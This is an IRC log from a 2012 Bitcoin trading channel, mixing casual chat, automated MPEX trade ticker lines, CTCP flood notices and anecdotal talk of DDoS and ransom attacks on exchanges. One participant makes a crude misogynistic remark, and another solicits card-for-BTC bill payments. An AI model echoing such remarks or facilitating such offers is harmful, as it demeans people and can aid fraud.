thats a nip of cheap whiskey Nov 07 00:30:30 cheap? Nov 07 00:30:45 mediumish maybe Nov 07 00:30:55 well... apparently it's also FOUR COWS Nov 07 00:31:02 last wisky i had was 12 usd for 750ml Nov 07 00:31:03 dude, $7.5 cows wtf. Nov 07 00:31:11 smickles: probably not whiskey Nov 07 00:31:12 that wasn't whiskey. Nov 07 00:31:16 drat. Nov 07 00:31:24 heh Nov 07 00:31:24 'bourbon' oslt? Nov 07 00:31:32 no, i don't like burbon so much Nov 07 00:32:29 where's my cherries rdponticelli_ Nov 07 00:34:30 $30 is a 21y/o balvenie at the place I spend the most money on whiskey Nov 07 00:34:53 which while not expensive is in the very fucking good whiskey category Nov 07 00:35:37 on the rollin on dubs whiskey scale Nov 07 00:36:38 some other bars would charge up to $200 for that nip Nov 07 00:39:48 Where are my peaches, mircea_popescu? Nov 07 00:40:32 http://polimedia.us/dtng/c/src/128223247928.jpg Nov 07 00:40:34 there. Nov 07 00:54:53 [MPEX] [S.MPOE] 4530 @ 0.0004994 = 2.2623 BTC [+] Nov 07 01:20:05 [MPEX] [S.MPOE] 4774 @ 0.0004974 = 2.3746 BTC [-] Nov 07 01:45:44 [MPEX] [S.MPOE] 35910 @ 0.0004974 = 17.8616 BTC [-] Nov 07 01:45:53 mircea_popescu: I think I found your Cherry, it was indeed in Argentina, and it's called Agustina: http://www.google.com/imgres?q=agustina+cherri&start=173&hl=es-419&client=iceweasel-a&sa=X&rls=org.mozilla:es-AR:unofficial&biw=1070&bih=585&tbm=isch&prmd=imvnslo&tbnid=otR9YIKXqvX21M:&imgrefurl=http://www.allstarpics.net/0046374/018089240/agustina-cherri-2004-pic.html&docid=LKYSJsKvUdWs-M&imgurl=http://img1.bdbphotos. Nov 07 01:45:53 com/images/orig/2/e/2eyzesvxmc0fvsmy.jpg&w=454&h=677&ei=L5aZUKu_E42B0AGXzoCIDw&zoom=1&iact=hc&vpx=223&vpy=47&dur=5779&hovh=274&hovw=184&tx=124&ty=175&sig=114756820779255678031&page=9&tbnh=159&tbnw=109&ndsp=21&ved=1t:429,r:74,s:100,i:226 Nov 07 01:45:59 failurl Nov 07 01:46:16 ;) Nov 07 01:46:32 ya srsly. Nov 07 01:48:31 Yeah, sorry.... Nov 07 01:48:56 Well, I tried Nov 07 01:49:45 :p Nov 07 02:10:58 [MPEX] [S.MPOE] 12416 @ 0.0004974 = 6.1757 BTC [-] Nov 07 02:11:00 [MPEX] [S.MPOE] 29687 @ 0.00049698 = 14.7538 BTC [-] Nov 07 02:36:07 [MPEX] [S.MPOE] 16804 @ 0.00049698 = 8.3513 BTC [-] Nov 07 03:01:22 [MPEX] [S.MPOE] 9090 @ 0.00049812 = 4.5279 BTC [+] Nov 07 03:01:23 [MPEX] [S.MPOE] 8641 @ 0.00050032 = 4.3233 BTC [+] **** BEGIN LOGGING AT Wed Nov 7 11:49:59 2012 Nov 07 11:58:48 [MPEX] [S.MPOE] 12286 @ 0.00049643 = 6.0991 BTC [+] Nov 07 11:58:50 [MPEX] [S.MPOE] 21495 @ 0.00049421 = 10.623 BTC [-] Nov 07 11:58:51 [MPEX] [S.MPOE] 31950 @ 0.00049355 = 15.7689 BTC [-] Nov 07 11:58:52 [MPEX] [S.MPOE] 6569 @ 0.00049315 = 3.2395 BTC [-] Nov 07 12:23:54 [MPEX] [S.MPOE] 25831 @ 0.00049315 = 12.7386 BTC [-] Nov 07 12:23:56 [MPEX] [S.MPOE] 11850 @ 0.00049303 = 5.8424 BTC [-] Nov 07 12:23:57 [MPEX] [S.MPOE] 28619 @ 0.00049282 = 14.104 BTC [-] Nov 07 12:49:44 [MPEX] [S.MPOE] 10355 @ 0.00049282 = 5.1032 BTC [-] Nov 07 13:15:30 [MPEX] [S.MPOE] 4526 @ 0.00049282 = 2.2305 BTC [-] Nov 07 13:15:32 [MPEX] [S.MPOE] 8993 @ 0.00049275 = 4.4313 BTC [-] Nov 07 13:41:00 [MPEX] [S.MPOE] 19000 @ 0.00050126 = 9.5239 BTC [+] Nov 07 13:41:02 [MPEX] [S.MPOE] 5800 @ 0.00050182 = 2.9106 BTC [+] Nov 07 13:57:54 anyone here intersted in paying a bill with their cc in exchange for btc Nov 07 14:07:01 [MPEX] [S.MPOE] 17456 @ 0.00049875 = 8.7062 BTC [-] Nov 07 14:32:44 [MPEX] [S.MPOE] 17200 @ 0.00049926 = 8.5873 BTC [+] Nov 07 14:57:55 [MPEX] [S.MPOE] 23266 @ 0.00050182 = 11.6753 BTC [+] Nov 07 14:57:56 [MPEX] [S.MPOE] 28734 @ 0.00050226 = 14.4319 BTC [+] Nov 07 15:23:01 [MPEX] [S.MPOE] 21116 @ 0.00050226 = 10.6057 BTC [+] Nov 07 15:23:03 [MPEX] [S.MPOE] 10500 @ 0.00050257 = 5.277 BTC [+] Nov 07 15:23:04 [MPEX] [S.MPOE] 4634 @ 0.00050296 = 2.3307 BTC [+] Nov 07 15:48:42 [MPEX] [S.MPOE] 9600 @ 0.00049999 = 4.7999 BTC [-] Nov 07 16:14:05 [MPEX] [S.MPOE] 4670 @ 0.00049926 = 2.3315 BTC [-] Nov 07 16:14:05 [MPEX] [S.MPOE] 1630 @ 0.00049875 = 0.813 BTC [-] Nov 07 16:39:30 [MPEX] [S.MPOE] 4314 @ 0.00049875 = 2.1516 BTC [-] Nov 07 16:39:32 [MPEX] [S.MPOE] 29250 @ 0.00049854 = 14.5823 BTC [-] Nov 07 16:39:54 so whats the deal with asics, who is going to get there first? Nov 07 17:04:55 [MPEX] [S.MPOE] 33753 @ 0.00049446 = 16.6895 BTC [-] Nov 07 17:04:56 [MPEX] [S.MPOE] 9247 @ 0.00049345 = 4.5629 BTC [-] Nov 07 17:30:06 [MPEX] [S.MPOE] 40553 @ 0.00049345 = 20.0109 BTC [-] Nov 07 17:30:08 [MPEX] [S.MPOE] 9247 @ 0.00049275 = 4.5565 BTC [-] Nov 07 17:55:27 [MPEX] [S.MPOE] 19450 @ 0.00049275 = 9.584 BTC [-] Nov 07 18:20:36 werd up Nov 07 18:22:16 [MPEX] [S.MPOE] 5636 @ 0.00049518 = 2.7908 BTC [+] Nov 07 18:23:19 wassup Nov 07 18:26:45 nuthhing Nov 07 18:27:39 talked to nefario today Nov 07 18:28:19 cyber or business ? Nov 07 18:28:36 he said it's now matter of days to a week to get this stuff all nicely cleared up Nov 07 18:30:35 o hey, october all over again Nov 07 18:30:58 yeah Nov 07 18:32:24 will see. Because most people are liars and thieves, it's close to impossible to clear it up without his help Nov 07 18:32:28 bitcoins keep one young/ Nov 07 18:36:56 mircea Nov 07 18:37:02 what's a popular romanian food Nov 07 18:37:07 besides chicken nuggets Nov 07 18:37:34 a sort of polenta called mamaliga is the traditional food. Nov 07 18:37:48 sarmale, which is cabbage stuffed with ground meat and rice, a turkish dish Nov 07 18:38:05 isnt it pork al quran or smth Nov 07 18:38:18 oo Nov 07 18:38:19 a local sort of baba ganoush (called simply eggplant salad) Nov 07 18:38:21 that actually sounds really good Nov 07 18:38:37 is pretty huge. Nov 07 18:38:54 tripe soup, various steaks and pan fries Nov 07 18:39:11 zacusca which i'm sure kako knows of, it's a veggie stew (usually preserved) Nov 07 18:39:41 tripe soup is preety eww. Nov 07 18:39:46 depends how much you drunk. Nov 07 18:39:52 :) Nov 07 18:40:13 there's loads rg, romanians are really high on cuisine. Nov 07 18:40:19 girl that can't cook = unfit to fuck. Nov 07 18:42:14 You are being CTCP flooded from [MOFO], ignoring *!*@ool-457a56df.dyn.optonline.net Nov 07 18:42:17 You are being CTCP flooded from [MOFO], ignoring *!*@ool-457a56df.dyn.optonline.net Nov 07 18:42:22 You are being CTCP flooded from [MOFO], ignoring *!*@ool-457a56df.dyn.optonline.net Nov 07 18:42:27 You are being CTCP flooded from [MOFO], ignoring *!*@ool-457a56df.dyn.optonline.net Nov 07 18:42:30 You are being CTCP flooded from [MOFO], ignoring *!*@ool-457a56df.dyn.optonline.net Nov 07 18:42:38 You are being CTCP flooded from [MOFO], ignoring *!*@ool-457a56df.dyn.optonline.net Nov 07 18:43:41 * [MOFO] (~gmycracki@ool-457a56df.dyn.optonline.net) has joined #bitcoin-assets Nov 07 18:43:41 * Received a CTCP PING 303129592 from [MOFO] (to #bitcoin-assets) Nov 07 18:43:41 * Received a CTCP PING 303130013 from [MOFO] (to #bitcoin-assets) Nov 07 18:43:41 * Received a CTCP PING 303130466 from [MOFO] (to #bitcoin-assets) Nov 07 18:43:41 You are being CTCP flooded from [MOFO], ignoring *!*@ool-457a56df.dyn.optonline.net Nov 07 18:43:44 this is kinda sweet. Nov 07 18:47:23 [MPEX] [S.MPOE] 6800 @ 0.00049999 = 3.3999 BTC [+] Nov 07 18:47:25 [MPEX] [S.MPOE] 42404 @ 0.00050296 = 21.3275 BTC [+] Nov 07 18:47:25 [MPEX] [S.MPOE] 4346 @ 0.00050299 = 2.186 BTC [+] Nov 07 18:48:24 [MPEX] [S.MPOE] 28854 @ 0.00050299 = 14.5133 BTC [+] Nov 07 18:48:25 [MPEX] [S.MPOE] 13488 @ 0.00050302 = 6.7847 BTC [+] Nov 07 18:48:27 [MPEX] [S.MPOE] 25250 @ 0.00050323 = 12.7066 BTC [+] Nov 07 18:48:28 [MPEX] [S.MPOE] 17000 @ 0.00050346 = 8.5588 BTC [+] Nov 07 18:48:30 [MPEX] [S.MPOE] 31200 @ 0.00050414 = 15.7292 BTC [+] Nov 07 18:48:31 [MPEX] [S.MPOE] 26600 @ 0.00050448 = 13.4192 BTC [+] Nov 07 18:48:32 [MPEX] [S.MPOE] 21600 @ 0.00050459 = 10.8991 BTC [+] Nov 07 18:48:33 [MPEX] [S.MPOE] 19000 @ 0.00050467 = 9.5887 BTC [+] Nov 07 18:48:35 [MPEX] [S.MPOE] 52008 @ 0.00050509 = 26.2687 BTC [+] Nov 07 18:49:19 omg .0005 is breached Nov 07 19:01:36 apparently the ban didnt help Nov 07 19:02:06 hm? Nov 07 19:02:10 its quiet here Nov 07 19:02:38 ú17:59] [CTCP] Received CTCP-PING request from [MOFO] to channel #bitcoin-dev, sending answer. Nov 07 19:02:51 thats -dev Nov 07 19:03:00 ah sry Nov 07 19:03:24 why do you answer to pings anyway ? Nov 07 19:03:48 [12:03] »» Ping reply from mircea_popescu: ? second(s) Nov 07 19:03:49 you reply Nov 07 19:04:05 you need to reply but only to server Nov 07 19:04:48 ? seconds ?! Nov 07 19:04:56 the new kind of int Nov 07 19:05:49 this is a brilliant idea! Nov 07 19:05:58 jurov, i think i'ma replace all ints with ? in statjson Nov 07 19:07:48 hehe Nov 07 19:08:28 you should also make a deal for ? trucks of cherries with the cat. Nov 07 19:10:12 for sure. Nov 07 19:10:15 ? trucks of ! Nov 07 19:11:02 BUY|!|? Nov 07 19:11:16 and pls document it first Nov 07 19:12:15 BUY|!|? documentation : !=* ; ? = % or _ depending on context. Nov 07 19:12:44 this is better than fix. Nov 07 19:12:52 and the discrimination between buy and sell has to cease. we'd save a lot of time if it just were Nov 07 19:12:55 TRADE|!|? Nov 07 19:13:50 yea, look up to mbot. Nov 07 19:14:00 [MPEX] [S.MPOE] 3592 @ 0.00050509 = 1.8143 BTC [+] Nov 07 19:14:01 [MPEX] [S.MPOE] 5245 @ 0.00050513 = 2.6494 BTC [+] Nov 07 19:14:12 also, shares should be divisible, like copumpkin says. and prices should sometimes include letters too. Nov 07 19:14:31 especially f and u. Nov 07 19:15:05 theres nothing wrong with scientific notation Nov 07 19:15:06 actually... maybe we could just use cherries instead of digits/letters. make mpex look more like a slot machine. Nov 07 19:15:53 put a cherry in the square instad of mermaid Nov 07 19:16:09 lol Nov 07 19:16:38 https://bitcointalk.org/index.php?topic=122558.msg1322374#msg1322374 ahaha Nov 07 19:16:53 bitcointalk.org. to entertain, educate and enrich. Nov 07 19:17:03 butt mostly entertain. Nov 07 19:17:49 ITS MY FIRST DAY OF WORK Nov 07 19:17:58 i really with Diablo-D3 did his hosting idea Nov 07 19:18:11 cause id work at the place where his servers were Nov 07 19:18:24 ! Nov 07 19:19:36 ? Nov 07 19:19:45 % Nov 07 19:19:55 here's a picture of some girls taking a bath http://polimedia.us/dtng/c/src/130990305915.jpg Nov 07 19:27:52 http://d24w6bsrhbeh9d.cloudfront.net/photo/5776631_700b.jpg Nov 07 19:28:36 lol Nov 07 19:39:27 [MPEX] [S.MPOE] 31606 @ 0.00050363 = 15.9177 BTC [-] Nov 07 20:05:15 [MPEX] [S.MPOE] 9523 @ 0.00050363 = 4.7961 BTC [-] Nov 07 20:05:17 [MPEX] [S.MPOE] 14000 @ 0.00050299 = 7.0419 BTC [-] Nov 07 20:05:18 [MPEX] [S.MPOE] 15862 @ 0.00050148 = 7.9545 BTC [-] Nov 07 20:30:42 [MPEX] [S.MPOE] 5493 @ 0.00050148 = 2.7546 BTC [-] Nov 07 20:30:43 [MPEX] [S.MPOE] 13956 @ 0.00049987 = 6.9762 BTC [-] Nov 07 20:30:45 [MPEX] [S.MPOE] 3814 @ 0.00049967 = 1.9057 BTC [-] Nov 07 20:30:46 [MPEX] [S.MPOE] 25337 @ 0.00049954 = 12.6568 BTC [-] Nov 07 22:14:16 [MPEX] [S.MPOE] 24667 @ 0.00050247 = 12.3944 BTC [+] Nov 07 22:14:17 [MPEX] [S.MPOE] 9333 @ 0.00050513 = 4.7144 BTC [+] Nov 07 22:39:55 [MPEX] [S.MPOE] 20522 @ 0.00050513 = 10.3663 BTC [+] Nov 07 22:39:57 [MPEX] [S.MPOE] 18200 @ 0.00050538 = 9.1979 BTC [+] Nov 07 22:39:58 [MPEX] [S.MPOE] 7708 @ 0.00050547 = 3.8962 BTC [+] Nov 07 22:54:24 https://bitcointalk.org/index.php?topic=122881.0 <<< if anyone can draw. Nov 07 22:58:04 cherries like these? http://www.kscm.cz Nov 07 22:58:22 (Communist Party of Bohemia and Moravia) Nov 07 22:58:40 kinda bent Nov 07 23:01:09 o hehe Nov 07 23:05:44 [MPEX] [S.MPOE] 21742 @ 0.00050547 = 10.9899 BTC [+] Nov 07 23:05:45 [MPEX] [S.MPOE] 22700 @ 0.00050552 = 11.4753 BTC [+] Nov 07 23:05:47 [MPEX] [S.MPOE] 7172 @ 0.0005059 = 3.6283 BTC [+] Nov 07 23:05:47 [MPEX] [S.MPOE] 10986 @ 0.0005064 = 5.5633 BTC [+] Nov 07 23:12:12 too bad i cant draw to save my life Nov 07 23:25:02 lol Nov 07 23:31:42 [MPEX] [S.MPOE] 18600 @ 0.000503 = 9.3558 BTC [-] Nov 07 23:34:34 the only truck I have to hand is probably not appropriate Nov 07 23:36:38 mircea_popescu: i herd you lik welfare Nov 07 23:36:39 jk Nov 07 23:46:22 https://bitcointalk.org/index.php?topic=119745.msg1321870#msg1321870 Nov 07 23:46:50 do i understand correctly? starts leverage trding platform using 300BTC capital? Nov 07 23:48:23 starfish ftw Nov 07 23:51:08 i don;t think 300 btc Nov 07 23:51:25 from what ppl were saying (mostly guruvan ) he has something like 30-60 btc of assets. Nov 07 23:52:50 this isn't the guy using the bitcoinica code without fixing any of the obvious bugs is it? Nov 07 23:53:01 lol katz has a change of heart https://bitcointalk.org/index.php?topic=121915.msg1322915#msg1322915 Nov 07 23:53:11 pigeons why yes, yes it is. Nov 07 23:53:43 well that's nice about katz, i respect changing your mind and realizing when your wrong, cause i have to do it all the time ;) Nov 07 23:54:06 the mildly obnoxious thing about it is that he does it with the "i always said" angle Nov 07 23:54:15 heh Nov 07 23:54:37 get all the pain and misery without any of the educational benefit sorta plan. Nov 07 23:55:47 sgornick who else got hit these past days with ddos/crap ? Nov 07 23:57:01 [MPEX] [S.MPOE] 14500 @ 0.00050437 = 7.3134 BTC [+] Nov 07 23:57:02 [MPEX] [S.MPOE] 14650 @ 0.00050258 = 7.3628 BTC [-] Nov 07 23:57:02 BTC-e gets hit pretty regularly. Their thread alleges it was a hit by Mt. Gox. Nov 07 23:57:18 o, that i heard but it seemed fluff. Nov 07 23:57:24 no it was the secret cabal that is out to get quickbitcoins Nov 07 23:57:25 WalletBit and BitPay got hit in September, with ransom note Nov 07 23:57:34 i had about 3-4 hours of 5-10 hits a second with bs requests Nov 07 23:57:42 masking a somewhat clumsy probing session Nov 07 23:57:58 If I remember correctly, I think BitSTAMP got a DDoS + ransom note recently too Nov 07 23:58:14 the server didn't care, and i wrote it off as noob/script kiddie, but if there's any pattern in btcworld that's interesting Nov 07 23:58:43 i hope the ransom note had goatscii Nov 07 23:59:18 i hope bitcoin makes actual ransom workable thus taking out of business everyone running shitty software Nov 07 23:59:25 that'd make me so happy i could cry. Nov 07 23:59:59 did you read the symantec emails, where the cfo said they would pay the ransom so long as it was in paypal Nov 08 00:00:03 the day shittysoft sales people all come home with "sorry, we can't afford all the ransoms to run your crapware" from all "customers" Nov 08 00:00:11 hahaha Nov 08 00:01:23 pastebin.com/GJEKf1T9 Nov 08 00:02:15 Mensaje verificado por el Antispam Terra. Nov 08 00:02:22 that part is possibly the funniest. Nov 08 00:02:39 Esta mensagem foi verificada pelo E-mail Protegido. Nov 08 00:03:21 pretty retarded stuff. but i hadn't seen it. Nov 08 00:04:48 symantec is pretty retarded, not sure why anyone would want thier source Nov 08 00:05:18 'need to fuck this computer up, brb installing NAV' Nov 08 00:07:48 lol Nov 08 00:08:05 their source was prolly lulzy Nov 08 00:09:40 well first they said, we dont care, release it, its old, then when they started letting it out they said hold on, let us fix some bugs! Nov 08 00:10:38 lol Nov 08 00:11:21 the blackmailing kids are just as ridiculous tjho Nov 08 00:11:43 what's this, southern confort blackmail ? Nov 08 00:20:05 well i dared, mircea_popescu https://bitcointalk.org/index.php?topic=122881.msg1322990#msg1322990 Nov 08 00:20:24 is that you or gf ? Nov 08 00:20:29 me Nov 08 00:21:11 actually it's pretty good but... Nov 08 00:21:15 where's the cherries ? Nov 08 00:21:22 umm? Nov 08 00:21:38 well ? Nov 08 00:21:51 the red balls in the cargo space Nov 08 00:22:09 this is a milk drawing. Nov 08 00:22:13 [MPEX] [S.MPOE] 11800 @ 0.00050449 = 5.953 BTC [+] Nov 08 00:22:17 :( Nov 08 00:22:25 o wait, there ARE cherries in there Nov 08 00:22:38 lol i thought just the stems Nov 08 00:22:42 no, srsly, pretty good. Nov 08 00:23:16 hm Nov 08 00:24:48 wait Nov 08 00:42:18 mircea_popescu https://bitcointalk.org/index.php?topic=122881.msg1323020#msg1323020 Nov 08 00:43:03 hm bah im missing the light on the last two and the bumper Nov 08 00:43:03 prolly last Nov 08 00:43:15 ya lol Nov 08 00:43:28 thats a quick fix Nov 08 00:48:30 done Nov 08 00:48:44 and with that im finished drawing this ridiculus shit. Nov 08 00:49:00 [MPEX] [S.MPOE] 28345 @ 0.00050449 = 14.2998 BTC [+] Nov 08 00:50:05 lol Nov 08 00:50:08 engrossing isn't it. Nov 08 00:50:15 ya Nov 08 00:50:20 5btc is not enough. Nov 08 00:55:09 [MPEX] [S.BVPS] 36 @ 0.0032 = 0.1152 BTC [+] Nov 08 01:20:10 [MPEX] [S.MPOE] 12550 @ 0.00050258 = 6.3074 BTC [-] Nov 08 01:20:12 [MPEX] [S.MPOE] 24600 @ 0.00050239 = 12.3588 BTC [-] Nov 08 01:20:13 [MPEX] [S.MPOE] 20350 @ 0.00050218 = 10.2194 BTC [-] Nov 08 01:45:25 [MPEX] [S.MPOE] 3546 @ 0.00050218 = 1.7807 BTC [-] Nov 08 01:45:27 [MPEX] [S.MPOE] 27880 @ 0.00050215 = 13.9999 BTC [-] Nov 08 01:45:27 [MPEX] [S.MPOE] 22074 @ 0.00050163 = 11.073 BTC [-] Nov 08 02:10:49 [MPEX] [S.MPOE] 12526 @ 0.00050163 = 6.2834 BTC [-] Nov 08 02:10:51 [MPEX] [S.MPOE] 3000 @ 0.00049955 = 1.4987 BTC [-] Nov 08 02:10:52 [MPEX] [S.MPOE] 1263 @ 0.00049954 = 0.6309 BTC [-] Nov 08 02:10:53 [MPEX] [S.MPOE] 1161 @ 0.00049939 = 0.5798 BTC [-] **** BEGIN LOGGING AT Thu Nov 8 10:25:23 2012 Nov 08 10:41:09 [MPEX] [S.MPOE] 19760 @ 0.00049606 = 9.8021 BTC [-] Nov 08 10:41:10 [MPEX] [S.MPOE] 13040 @ 0.00049536 = 6.4595 BTC [-] Nov 08 11:06:34 [MPEX] [S.MPOE] 23825 @ 0.00049913 = 11.8918 BTC [+] Nov 08 11:06:35 [MPEX] [S.MPOE] 12175 @ 0.00050039 = 6.0922 BTC [+] Nov 08 11:33:53 [MPEX] [S.MPOE] 16500 @ 0.00049837 = 8.2231 BTC [-] Nov 08 11:59:05 [MPEX] [S.MPOE] 14600 @ 0.00049837 = 7.2762 BTC [-] Nov 08 11:59:05 [MPEX] [S.MPOE] 1900 @ 0.0004961 = 0.9426 BTC [-] Nov 08 12:24:32 [MPEX] [S.MPOE] 32172 @ 0.0004961 = 15.9605 BTC [-] Nov 08 12:24:34 [MPEX] [S.MPOE] 17985 @ 0.00049592 = 8.9191 BTC [-] Nov 08 12:49:33 [MPEX] [S.MPOE] 14339 @ 0.00049851 = 7.1481 BTC [+] Nov 08 13:14:45 [MPEX] [S.MPOE] 2415 @ 0.00049592 = 1.1976 BTC [-] Nov 08 13:14:46 [MPEX] [S.MPOE] 17700 @ 0.0004956 = 8.7721 BTC [-] Nov 08 13:14:48 [MPEX] [S.MPOE] 6635 @ 0.00049541 = 3.287 BTC [-] Nov 08 13:42:04 [MPEX] [S.MPOE] 24400 @ 0.000497 = 12.1268 BTC [+] Nov 08 13:43:25 [MPEX] [S.MPOE] 1659 @ 0.000497 = 0.8245 BTC [+] Nov 08 13:43:26 [MPEX] [S.MPOE] 36509 @ 0.00049666 = 18.1326 BTC [-] Nov 08 13:43:28 [MPEX] [S.MPOE] 3622 @ 0.00049594 = 1.7963 BTC [-] Nov 08 13:43:28 [MPEX] [S.MPOE] 7965 @ 0.00049541 = 3.9459 BTC [-] Nov 08 13:43:29 [MPEX] [S.MPOE] 20910 @ 0.00049536 = 10.358 BTC [-] Nov 08 13:43:30 [MPEX] [S.MPOE] 29750 @ 0.00049534 = 14.7364 BTC [-] Nov 08 13:43:31 [MPEX] [S.MPOE] 49139 @ 0.00049518 = 24.3327 BTC [-] Nov 08 13:43:33 [MPEX] [S.MPOE] 5000 @ 0.00049362 = 2.4681 BTC [-] Nov 08 13:43:34 [MPEX] [S.MPOE] 22550 @ 0.00049334 = 11.1248 BTC [-] Nov 08 13:43:35 [MPEX] [S.MPOE] 10200 @ 0.00049291 = 5.0277 BTC [-] Nov 08 13:43:36 [MPEX] [S.MPOE] 1110 @ 0.00049275 = 0.547 BTC [-] Nov 08 13:43:37 [MPEX] [S.MPOE] 9200 @ 0.00049272 = 4.533 BTC [-] Nov 08 13:43:37 [MPEX] [S.MPOE] 12200 @ 0.00049261 = 6.0098 BTC [-] Nov 08 13:43:38 [MPEX] [S.MPOE] 20250 @ 0.00049245 = 9.9721 BTC [-] Nov 08 13:43:39 [MPEX] [S.MPOE] 56236 @ 0.0004924 = 27.6906 BTC [-] Nov 08 13:43:40 [MPEX] [S.MPOE] 46900 @ 0.00049228 = 23.0879 BTC [-] Nov 08 13:43:41 [MPEX] [S.MPOE] 17500 @ 0.00049209 = 8.6116 BTC [-] Nov 08 13:43:42 [MPEX] [S.MPOE] 49500 @ 0.00049205 = 24.3565 BTC [-] Nov 08 13:43:43 [MPEX] [S.MPOE] 43400 @ 0.00049205 = 21.355 BTC [-] Nov 08 13:43:45 [MPEX] [S.MPOE] 16700 @ 0.00049191 = 8.2149 BTC [-] Nov 08 13:43:46 [MPEX] [S.MPOE] 20250 @ 0.00049186 = 9.9602 BTC [-] Nov 08 13:43:47 [MPEX] [S.MPOE] 21050 @ 0.0004918 = 10.3524 BTC [-] Nov 08 13:43:47 [MPEX] [S.MPOE] 16334 @ 0.0004917 = 8.0314 BTC [-] Nov 08 13:43:48 [MPEX] [S.MPOE] 39100 @ 0.00049157 = 19.2204 BTC [-] Nov 08 13:43:49 [MPEX] [S.MPOE] 44050 @ 0.00049154 = 21.6523 BTC [-] Nov 08 13:43:50 [MPEX] [S.MPOE] 23400 @ 0.00049136 = 11.4978 BTC [-] Nov 08 13:43:51 [MPEX] [S.MPOE] 55130 @ 0.0004912 = 27.0799 BTC [-] Nov 08 13:43:52 [MPEX] [S.MPOE] 32350 @ 0.000491 = 15.8839 BTC [-] Nov 08 13:43:53 [MPEX] [S.MPOE] 57864 @ 0.00049064 = 28.3904 BTC [-] Nov 08 13:43:54 [MPEX] [S.MPOE] 9600 @ 0.00049032 = 4.7071 BTC [-] Nov 08 13:43:55 [MPEX] [S.MPOE] 12216 @ 0.00049019 = 5.9882 BTC [-] Nov 08 13:43:56 [MPEX] [S.MPOE] 46400 @ 0.00048988 = 22.7304 BTC [-] Nov 08 13:43:57 [MPEX] [S.MPOE] 37450 @ 0.00048978 = 18.3423 BTC [-] Nov 08 13:43:57 [MPEX] [S.MPOE] 31500 @ 0.00048976 = 15.4274 BTC [-] Nov 08 13:43:58 [MPEX] [S.MPOE] 18500 @ 0.00048936 = 9.0532 BTC [-] Nov 08 13:43:59 [MPEX] [S.MPOE] 17100 @ 0.00048859 = 8.3549 BTC [-] Nov 08 13:44:00 [MPEX] [S.MPOE] 52010 @ 0.00048836 = 25.3996 BTC [-] Nov 08 13:44:01 [MPEX] [S.MPOE] 16611 @ 0.00047874 = 7.9524 BTC [-] Nov 08 13:44:02 [MPEX] [S.MPOE] 36650 @ 0.00047864 = 17.5422 BTC [-] Nov 08 13:44:03 [MPEX] [S.MPOE] 17200 @ 0.00047842 = 8.2288 BTC [-] Nov 08 13:44:04 [MPEX] [S.MPOE] 5694 @ 0.00047841 = 2.7241 BTC [-] Nov 08 13:44:05 [MPEX] [S.MPOE] 34800 @ 0.00047813 = 16.6389 BTC [-] Nov 08 13:44:06 [MPEX] [S.MPOE] 27700 @ 0.00047793 = 13.2387 BTC [-] Nov 08 13:44:07 [MPEX] [S.MPOE] 15850 @ 0.00047793 = 7.5752 BTC [-] Nov 08 13:44:08 [MPEX] [S.MPOE] 45659 @ 0.00047788 = 21.8195 BTC [-] Nov 08 13:44:09 [MPEX] [S.MPOE] 18450 @ 0.00047778 = 8.815 BTC [-] Nov 08 13:44:10 [MPEX] [S.MPOE] 20100 @ 0.0004772 = 9.5917 BTC [-] Nov 08 13:44:11 [MPEX] [S.MPOE] 12300 @ 0.00047719 = 5.8694 BTC [-] Nov 08 13:44:12 [MPEX] [S.MPOE] 43671 @ 0.00047717 = 20.8385 BTC [-] Nov 08 13:44:13 [MPEX] [S.MPOE] 24367 @ 0.0004767 = 11.6157 BTC [-] Nov 08 13:44:14 [MPEX] [S.MPOE] 24450 @ 0.00047662 = 11.6534 BTC [-] Nov 08 13:44:15 [MPEX] [S.MPOE] 42892 @ 0.00047618 = 20.4243 BTC [-] Nov 08 13:44:16 [MPEX] [S.MPOE] 48100 @ 0.0004754 = 22.8667 BTC [-] Nov 08 13:44:17 [MPEX] [S.MPOE] 52000 @ 0.000475 = 24.7 BTC [-] Nov 08 13:44:18 [MPEX] [S.MPOE] 22000 @ 0.00047486 = 10.4469 BTC [-] Nov 08 13:44:19 [MPEX] [S.MPOE] 21050 @ 0.00047402 = 9.9781 BTC [-] Nov 08 13:44:20 [MPEX] [S.MPOE] 38674 @ 0.00047373 = 18.321 BTC [-] Nov 08 13:44:21 [MPEX] [S.MPOE] 28950 @ 0.00047354 = 13.709 BTC [-] Nov 08 13:44:22 [MPEX] [S.MPOE] 14400 @ 0.00047351 = 6.8185 BTC [-] Nov 08 13:44:23 [MPEX] [S.MPOE] 16902 @ 0.00047304 = 7.9953 BTC [-] Nov 08 13:44:24 [MPEX] [S.MPOE] 23000 @ 0.00047279 = 10.8742 BTC [-] Nov 08 13:44:49 [MPEX] [S.MPOE] 153926 @ 0.00047 = 72.3452 BTC [-] Nov 08 13:44:51 [MPEX] [S.MPOE] 1074 @ 0.00049723 = 0.534 BTC [+] Nov 08 14:02:34 46 is in sight Nov 08 14:09:58 [MPEX] [S.MPOE] 30776 @ 0.00049723 = 15.3028 BTC [+] Nov 08 14:10:00 [MPEX] [S.MPOE] 2116 @ 0.00049773 = 1.0532 BTC [+] Nov 08 14:13:39 bonjour, débrouillards! Nov 08 14:20:01 The 165th birthday of novelist Bram Stoker has been marked by Google with a Dracula illustration hahaha Nov 08 14:34:51 ow da fuck happened here. Nov 08 14:35:27 [MPEX] [S.MPOE] 6050 @ 0.00049773 = 3.0113 BTC [+] Nov 08 14:44:23 http://imgs.xkcd.com/comics/math.png Nov 08 14:44:54 lol Nov 08 14:53:22 hehe http://imgs.xkcd.com/comics/the_universal_label.png Nov 08 14:56:41 https://docs.google.com/file/d/0BxnW49twNMNbeEFXUWpqeGhDRUU Nov 08 14:57:58 kakobrekla: i don't know anything about htem if you feel like putting them in the topic or checking them out or whatever https://www.havelockinvestments.com/funds.php Nov 08 14:59:11 this is new? Nov 08 14:59:17 does it have a forum thread? Nov 08 15:01:05 [MPEX] [S.MPOE] 8114 @ 0.00049773 = 4.0386 BTC [+] Nov 08 15:01:07 [MPEX] [S.MPOE] 10561 @ 0.00049851 = 5.2648 BTC [+] Nov 08 15:01:08 [MPEX] [S.MPOE] 1725 @ 0.00050039 = 0.8632 BTC [+] Nov 08 15:01:09 [MPEX] [S.MPOE] 22958 @ 0.00050077 = 11.4967 BTC [+] Nov 08 15:04:59 no i don't see much as far as a forum thread, just this: https://bitcointalk.org/index.php?topic=87002 Nov 08 15:05:30 However, the other fund on that site has a pretty good thread: https://bitcointalk.org/index.php?topic=119628.0 Nov 08 15:05:53 inb4 popescu ridicule Nov 08 15:11:46 huh ? Nov 08 15:12:28 someone decided to play stock market. i am in before your ridicule of them Nov 08 15:12:40 "With the lack of a prominent 